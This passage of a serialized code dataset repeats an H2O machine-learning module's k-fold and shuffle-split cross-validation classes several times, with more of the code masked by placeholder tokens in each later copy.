super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
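Every _iter_indices body above first calls _validate_shuffle_split(n_samples, self.test_size, self.train_size). That helper is imported, so its body never appears in these rows; the sketch below is a plausible reconstruction inferred purely from the call sites, not the library's actual implementation.

import math

def validate_shuffle_split(n_samples, test_size, train_size):
    # Hypothetical helper: accepts float fractions or absolute ints;
    # train_size=None means "everything left after the test set".
    if isinstance(test_size, float):
        n_test = int(math.ceil(test_size * n_samples))
    else:
        n_test = int(test_size)
    if train_size is None:
        n_train = n_samples - n_test
    elif isinstance(train_size, float):
        n_train = int(math.floor(train_size * n_samples))
    else:
        n_train = int(train_size)
    if n_train + n_test > n_samples:
        raise ValueError('train and test sizes together exceed n_samples')
    return n_train, n_test

print(validate_shuffle_split(100, 0.25, None))  # -> (75, 25)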
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
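The H2OKFold iterator repeated in these rows sizes folds with integer division and hands the remainder to the first n_obs % n_folds folds. A self-contained sketch of just that logic, with arbitrary toy sizes (plain int stands in for the deprecated np.int used by the serialized code):

import numpy as np

n_obs, n_folds = 10, 3  # arbitrary toy sizes
indices = np.arange(n_obs)

# Base fold size everywhere, plus one extra row for the leading folds.
fold_sizes = (n_obs // n_folds) * np.ones(n_folds, dtype=int)
fold_sizes[: n_obs % n_folds] += 1  # -> [4, 3, 3]

current = 0
for fold_size in fold_sizes:
    start, stop = current, current + fold_size
    print(indices[start:stop])  # [0 1 2 3], then [4 5 6], then [7 8 9]
    current = stop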
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n <function token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
